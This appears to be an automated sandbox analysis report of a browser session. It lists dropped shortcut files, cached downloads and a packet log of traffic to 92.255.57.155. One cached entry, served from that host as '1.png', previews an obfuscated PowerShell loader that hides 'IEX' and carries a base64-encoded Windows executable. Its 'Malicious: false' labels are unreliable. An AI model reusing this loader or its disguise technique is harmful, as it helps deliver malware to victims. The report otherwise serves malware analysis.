SHA-256:	97D103716D22D5D70B032426FA477C43D3E29CCDAE384C011C6B0F7A223BBCF1
SHA-512:	0D4D633CD84FD3F81D426F2045BAC5BE4512D2692A29FD764F5AF2DF971EB207E2CF7DDCA9AF79E8AF023ABABED2CC4EC6DEA49392DDE393F311A7BF8706EF73
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.........b......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I(Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V(Z......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V(Z.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V(Z.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............?.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 21:20:36 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	4.003351475692054
Encrypted:	false
SSDEEP:	48:8pr7dojTJ7GaH2idAKZdA1VehBiZUk1W1qehEy+C:8prKj4y9ky
MD5:	CFF664E1C3288A88C4156902CB13BEED
SHA1:	EE185968F0A765112EDCCD0311716659CACC51F8
SHA-256:	DB7D99A64BA26791D483CA80A7CA762E774029F9641077E405998C1392F20A17
SHA-512:	7149E6EBD6D6873C6F5C7BE21318B08A9C4A868D82D1B505085A59BC257AB5C29120AB2809B69FEC1B5B07647DC81B7C50B77C84B5C2FCC1000B6AC1308008DA
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,....X...b......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I(Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V(Z......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V(Z.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V(Z.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............?.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 21:20:36 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	4.013839359852333
Encrypted:	false
SSDEEP:	48:8D7dojTJ7GaH2idAKZdA1duT6ehOuTbbiZUk5OjqehOuTbmy+yT+:8DKj4QTTTbxWOvTbmy7T
MD5:	459C09719443526E0EB508FCAF35A579
SHA1:	D4BEAA09F0EA29B633E3CFC6DABBFD8D1BC6D315
SHA-256:	7C98988664C83A07B10408926FF59B9776FA33313E8A2AF3DBF9E66889640AEA
SHA-512:	A80FCED3F18F0A060C187393858A98C9EE2FE8623EA76D38C4EEBE6D5C7EA0EEC8C655293C9A2036BD6307CC958A346EDFA011BB816AD32159350327C3B0D968
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.....B...b......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I(Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V(Z......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V(Z.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V(Z.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............?.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 65

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	1245
Entropy (8bit):	5.462849750105637
Encrypted:	false
SSDEEP:	24:hM0mIAvy4Wvsqs1Ra7JZRGNeHX+AYcvP2wk1RjdEF3qpMk5:lmIAq1UqsziJZ+eHX+AdP2TvpMk5
MD5:	5343C1A8B203C162A3BF3870D9F50FD4
SHA1:	04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
SHA-256:	DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
SHA-512:	E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
Malicious:	false
Reputation:	low
URL:	http://92.255.57.155/favicon.ico
Preview:	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co

Chrome Cache Entry: 66

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65461), with CRLF line terminators
Category:	downloaded
Size (bytes):	115261
Entropy (8bit):	5.0698319105078795
Encrypted:	false
SSDEEP:	3072:kvUixeAKzAgnV8519yuKXwB4c4K15IiTksfUXLID5uzynrKMkHckRJs9Skjugil6:yeAKzAgnVwyuKXwB4c4K15IiTksfUXLW
MD5:	8DF4AC24EA37D95679DDA12BBDF3D021
SHA1:	8C7881E04B2EC0E4F352E531AD02A31E79A36B53
SHA-256:	1417811E6DF4FA655AA70A388473D57E529526674011FD60A1EA56B86684118B
SHA-512:	692B3C8D8AAA9E9F96E5D3A8E58DED31546E26A9F39F4B8EF25D44DAFC2616EAA980913E4597A1B16DB5EB7127667ED7967844558B8C61818E903220DECB87A8
Malicious:	false
Reputation:	low
URL:	http://92.255.57.155/1/1.png
Preview:	ipconfig /flushdns...... $t0='JOOOOIEX'.replace('JOOOO','');sal GG $t0;....$JOOOO="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAHi2XWcAAAAAAAAAAOAALiELATAAACYBAAAqAQAAAAAAMkUBAAAgAAAAYAEAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACgAQAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAANhEAQBXAAAAAIABAEQDAAAAAAAAAAAAAAAAAAAAAAAAAGABAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAOCUBAAAgAAAAJgEAAAIAAAAAAAAAAAAAAAAAACAAAGAucmVsb2MAAAwAAAAAYAEAAAIAAAAoAQAAAAAAAAAAAAAAAABAAABCLnJzcmMAAABEAwAAAIABAAAEAAAAKgEAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAURQEAAAAAAEgAAAACAAUA+J0AAOCmAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMwAwAQAAAAAQAAESggAAAGKBoAAAYoAgAABioTMAoAKgEAAAIAABEgH9ieIigBAAArCigAAgAGKAQAAAYLByD80hV0KAIAACsXKNwBAAYTBBEEFijXAQAGKAUAAAaiEQQ

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 23:20:35.895515919 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:35.895798922 CET	49715	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:35.899329901 CET	49716	443	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:35.899363041 CET	443	49716	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:35.899605989 CET	49716	443	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:35.899974108 CET	49716	443	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:35.899986982 CET	443	49716	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:35.900439024 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:35.900520086 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:35.900625944 CET	80	49715	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:35.900738001 CET	49715	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:36.520420074 CET	49678	443	192.168.2.17	204.79.197.200
Jan 8, 2025 23:20:36.520421028 CET	49676	443	192.168.2.17	204.79.197.200
Jan 8, 2025 23:20:36.520437956 CET	49677	443	192.168.2.17	204.79.197.200
Jan 8, 2025 23:20:38.911380053 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:38.916322947 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.130882025 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.130906105 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.130918026 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.130923033 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.130934954 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.130945921 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.130954981 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.130968094 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.131033897 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.131042004 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.131046057 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.131114960 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.131135941 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.135889053 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.135905027 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.135917902 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.135930061 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.135987043 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.252558947 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.252572060 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.252643108 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.252655029 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.252664089 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.252962112 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.252962112 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.253072977 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.253082991 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.253092051 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.253134966 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.253173113 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.253572941 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.253583908 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.253593922 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.253602982 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.253614902 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.253638029 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.253670931 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.254360914 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.254371881 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.254383087 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.254424095 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.254431963 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.254442930 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.254442930 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.254488945 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.255234957 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.255247116 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.255251884 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.255286932 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.255297899 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.255306959 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.255347967 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.256050110 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.256109953 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.257774115 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.257839918 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.257883072 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.374530077 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.374552011 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.374563932 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.374574900 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.374584913 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.374594927 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.374608040 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.374619007 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.374624968 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.374677896 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.374747038 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.374844074 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.374882936 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.374882936 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.374901056 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.374912977 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.374922991 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.374963045 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.374986887 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.375190020 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.375200987 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.375210047 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.375221014 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.375231981 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.375237942 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.375245094 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.375263929 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.375271082 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.375274897 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.375300884 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.375323057 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.375705957 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.375716925 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.375763893 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.375843048 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.375854969 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.375864983 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.375894070 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.375907898 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.375919104 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.375926971 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.375937939 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.375947952 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.375977993 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.376055002 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.376065969 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.376075029 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.376085043 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.376095057 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.376097918 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.376116037 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.376135111 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.376626968 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.376683950 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.376694918 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.376729965 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.376749992 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.376763105 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.376769066 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.376777887 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.376805067 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.419395924 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.496252060 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.496270895 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.496280909 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.496292114 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.496300936 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.496311903 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.496346951 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.496401072 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.496419907 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.496436119 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.496447086 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.496455908 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.496467113 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.496484995 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.496521950 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.496531963 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.496543884 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.496552944 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.496581078 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.496601105 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.496762037 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.496772051 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.496783018 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.496815920 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.496848106 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.496860027 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.496912003 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.515044928 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.519805908 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.736413956 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.736430883 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:20:39.736574888 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:20:39.797111988 CET	49717	443	192.168.2.17	142.250.186.68
Jan 8, 2025 23:20:39.797156096 CET	443	49717	142.250.186.68	192.168.2.17
Jan 8, 2025 23:20:39.797266960 CET	49717	443	192.168.2.17	142.250.186.68
Jan 8, 2025 23:20:39.797532082 CET	49717	443	192.168.2.17	142.250.186.68
Jan 8, 2025 23:20:39.797552109 CET	443	49717	142.250.186.68	192.168.2.17
Jan 8, 2025 23:20:40.449996948 CET	443	49717	142.250.186.68	192.168.2.17
Jan 8, 2025 23:20:40.450378895 CET	49717	443	192.168.2.17	142.250.186.68
Jan 8, 2025 23:20:40.450419903 CET	443	49717	142.250.186.68	192.168.2.17
Jan 8, 2025 23:20:40.451304913 CET	443	49717	142.250.186.68	192.168.2.17
Jan 8, 2025 23:20:40.451441050 CET	49717	443	192.168.2.17	142.250.186.68
Jan 8, 2025 23:20:40.452758074 CET	49717	443	192.168.2.17	142.250.186.68
Jan 8, 2025 23:20:40.452826023 CET	443	49717	142.250.186.68	192.168.2.17
Jan 8, 2025 23:20:40.499382973 CET	49717	443	192.168.2.17	142.250.186.68
Jan 8, 2025 23:20:40.499424934 CET	443	49717	142.250.186.68	192.168.2.17
Jan 8, 2025 23:20:40.547425985 CET	49717	443	192.168.2.17	142.250.186.68
Jan 8, 2025 23:20:47.975745916 CET	49699	443	192.168.2.17	204.79.197.200
Jan 8, 2025 23:20:47.981467962 CET	443	49699	204.79.197.200	192.168.2.17
Jan 8, 2025 23:20:48.074696064 CET	443	49699	204.79.197.200	192.168.2.17
Jan 8, 2025 23:20:48.074835062 CET	49699	443	192.168.2.17	204.79.197.200
Jan 8, 2025 23:20:48.076098919 CET	49699	443	192.168.2.17	204.79.197.200
Jan 8, 2025 23:20:48.076145887 CET	49699	443	192.168.2.17	204.79.197.200
Jan 8, 2025 23:20:48.076309919 CET	49699	443	192.168.2.17	204.79.197.200
Jan 8, 2025 23:20:48.076565981 CET	49699	443	192.168.2.17	204.79.197.200
Jan 8, 2025 23:20:48.076626062 CET	49699	443	192.168.2.17	204.79.197.200
Jan 8, 2025 23:20:48.080924034 CET	443	49699	204.79.197.200	192.168.2.17
Jan 8, 2025 23:20:48.080934048 CET	443	49699	204.79.197.200	192.168.2.17
Jan 8, 2025 23:20:48.081075907 CET	443	49699	204.79.197.200	192.168.2.17
Jan 8, 2025 23:20:48.081254959 CET	443	49699	204.79.197.200	192.168.2.17
Jan 8, 2025 23:20:48.081356049 CET	443	49699	204.79.197.200	192.168.2.17
Jan 8, 2025 23:20:48.081510067 CET	443	49699	204.79.197.200	192.168.2.17
Jan 8, 2025 23:20:48.172926903 CET	443	49699	204.79.197.200	192.168.2.17
Jan 8, 2025 23:20:48.172993898 CET	49699	443	192.168.2.17	204.79.197.200
Jan 8, 2025 23:20:48.310667992 CET	443	49699	204.79.197.200	192.168.2.17
Jan 8, 2025 23:20:48.310730934 CET	49699	443	192.168.2.17	204.79.197.200
Jan 8, 2025 23:20:50.364849091 CET	443	49717	142.250.186.68	192.168.2.17
Jan 8, 2025 23:20:50.364923954 CET	443	49717	142.250.186.68	192.168.2.17
Jan 8, 2025 23:20:50.365230083 CET	49717	443	192.168.2.17	142.250.186.68
Jan 8, 2025 23:20:51.296288967 CET	49717	443	192.168.2.17	142.250.186.68
Jan 8, 2025 23:20:51.296333075 CET	443	49717	142.250.186.68	192.168.2.17
Jan 8, 2025 23:20:52.757828951 CET	49675	443	192.168.2.17	204.79.197.203
Jan 8, 2025 23:20:53.060501099 CET	49675	443	192.168.2.17	204.79.197.203
Jan 8, 2025 23:20:53.668498993 CET	49675	443	192.168.2.17	204.79.197.203
Jan 8, 2025 23:20:54.883420944 CET	49675	443	192.168.2.17	204.79.197.203
Jan 8, 2025 23:20:56.910687923 CET	49680	443	192.168.2.17	20.189.173.13
Jan 8, 2025 23:20:57.211432934 CET	49680	443	192.168.2.17	20.189.173.13
Jan 8, 2025 23:20:57.291414022 CET	49675	443	192.168.2.17	204.79.197.203
Jan 8, 2025 23:20:57.819051981 CET	49680	443	192.168.2.17	20.189.173.13
